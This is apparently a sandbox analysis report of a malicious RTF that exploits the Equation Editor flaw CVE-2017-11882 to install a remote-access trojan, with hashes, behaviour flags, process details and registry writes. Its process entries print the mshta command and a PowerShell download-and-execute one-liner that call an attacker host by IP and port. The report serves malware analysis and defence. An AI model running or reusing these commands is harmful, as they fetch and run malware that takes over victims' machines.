General Info

File name

Arrival Notice.doc

Full analysis
https://app.any.run/tasks/f03410f8-b6dd-4c59-8ccc-b9ff65f1be9c
Verdict
Malicious activity
Analysis date
10/9/2019, 20:00:40
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

  • ole-embedded
  • generated-doc
  • exploit
  • CVE-2017-11882
  • trojan
  • evasion
  • rat
  • agenttesla

MIME:
text/rtf
File info:
Rich Text Format data, version 1, unknown character set
MD5
feeab7c41b73d8f03b3d4d005a8b8bf3
SHA1
cb4da77e47fbb97b9dab5c42fe8ff42bb25953a5
SHA256
1ae650453a47cbf7872860245c7feff1dc7f82e9afc0ae9d431b66ca6f324ade
SSDEEP
768:qxrBqbeW6HHkXzD7p2ogaPPPPPhPPPPPgPPPPP/tpeyevzoR8oVojrc9YU:qqbUtwNpoWPcKU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
180 seconds
Additional time used
120 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Loads dropped or rewritten executable
  • ufec.exe (PID: 3084)
Application was dropped or rewritten from another process
  • ufec.exe (PID: 3084)
Equation Editor starts application (CVE-2017-11882)
  • EQNEDT32.EXE (PID: 1640)
Executable content was dropped or overwritten
  • ufec.exe (PID: 3084)
  • powershell.exe (PID: 2760)
Creates files in the user directory
  • ufec.exe (PID: 3084)
  • powershell.exe (PID: 2760)
Executed via WMI
  • powershell.exe (PID: 2760)
PowerShell script executed
  • powershell.exe (PID: 2760)
Starts MSHTA.EXE for opening HTA or HTMLS files
  • EQNEDT32.EXE (PID: 1640)
Connects to unusual port
  • MsHTa.exe (PID: 2840)
  • powershell.exe (PID: 2760)
Executed via COM
  • EQNEDT32.EXE (PID: 1640)
Application was crashed
  • EQNEDT32.EXE (PID: 1640)
Creates files in the user directory
  • WINWORD.EXE (PID: 2700)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2700)
Reads internet explorer settings
  • MsHTa.exe (PID: 2840)

Static information

TRiD
.rtf: Rich Text Format (100%)
EXIF
RTF
Author:
FireSecIT
LastModifiedBy:
FireSecIT
CreateDate:
2019:10:07 21:04:00
ModifyDate:
2019:10:07 21:04:00
RevisionNumber:
1
TotalEditTime:
null
Pages:
1
Words:
null
Characters:
null
CharactersWithSpaces:
null
InternalVersionNumber:
95

Processes

Total processes
42
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Process information

PID
2700
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Arrival Notice.doc.rtf"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\sxs.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\prntvpt.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll

PID
1640
CMD
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Path
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Design Science, Inc.
Description
Microsoft Equation Editor
Version
00110900
Modules
Image
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msi.dll
c:\program files\common files\microsoft shared\equation\1033\eeintl.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\mshta.exe

PID
2840
CMD
MsHTa http://103.207.38.8:1010/hta &AAAAAAAA C
Path
C:\Windows\system32\MsHTa.exe
Indicators
Parent process
EQNEDT32.EXE
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\jscript.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2760
CMD
powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://103.207.38.8:1010/get'));
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\users\public\ufec.exe
c:\windows\system32\netutils.dll

PID
3084
CMD
"C:\Users\Public\ufec.exe"
Path
C:\Users\Public\ufec.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\public\ufec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\version.dll
c:\windows\system32\shfolder.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\nsh847e.tmp\system.dll
c:\users\admin\appdata\local\temp\nsh847e.tmp\bgimage.dll
c:\windows\system32\winmm.dll

Registry activity

Total events
1003
Read events
824
Write events
178
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
2700
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
6k"
366B22008C0A0000010000000000000000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1330184241
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1330184355
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1330184356
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
8C0A0000DEEDF981CB7ED50100000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
:m"
3A6D22008C0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
1o"
316F22008C0A000006000000010000006C000000020000005C0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C006100720072006900760061006C0020006E006F0074006900630065002E0064006F0063002E00720074006600000000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D57ECB8507CF00][O00000000]*C:\Users\admin\Desktop\
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D57ECB850A4000][O00000000]*C:\Users\admin\Desktop\Arrival Notice.doc.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 2
[F00000000][T01D2B42B15FB5780][O00000000]*C:\Users\admin\Desktop\retailangeles.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 3
[F00000000][T01D378FFE1163D80][O00000000]*C:\Users\admin\Desktop\settingsbusinesses.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 4
[F00000000][T01D389843DED4000][O00000000]*C:\Users\admin\Desktop\beautifuloptions.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 5
[F00000000][T01D4A18A80BAC700][O00000000]*C:\Users\admin\Documents\policestatement.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 6
[F00000000][T01D312A924E51200][O00000000]*C:\Users\admin\Documents\propertyfunding.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 7
[F00000000][T01D520F8F88D4880][O00000000]*C:\Users\admin\Documents\michiganall.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 8
[F00000000][T01D39228602D7C80][O00000000]*C:\Users\admin\Documents\kingii.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 9
[F00000000][T01D3A2ACBD084100][O00000000]*C:\Users\admin\Documents\incdoes.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 10
[F00000000][T01D41196D7FB9D00][O00000000]*C:\Users\admin\Documents\quiteabove.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 11
[F00000000][T01D3A00CA9819280][O00000000]*C:\Users\admin\Documents\rolecomplex.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\1875F7
1875F7
040000008C0A00002D00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C004100720072006900760061006C0020004E006F0074006900630065002E0064006F0063002E00720074006600160000004100720072006900760061006C0020004E006F0074006900630065002E0064006F0063002E007200740066000000000001000000000000000EDBE681CB7ED501F7751800F775180000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184241
2700
WINWORD.EXE
write
